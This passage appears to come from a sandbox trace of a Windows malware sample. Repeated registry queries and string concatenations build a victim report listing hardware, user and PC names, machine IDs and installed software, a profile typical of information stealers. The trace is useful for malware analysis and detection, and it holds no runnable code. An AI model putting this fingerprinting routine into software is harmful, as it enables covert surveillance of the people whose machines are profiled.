en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" [0175.947] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="12.0.30501.0", lpcbData=0x197fd4*=0xd) returned 0x0 [0175.947] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 " [0175.947] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0" [0175.947] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: 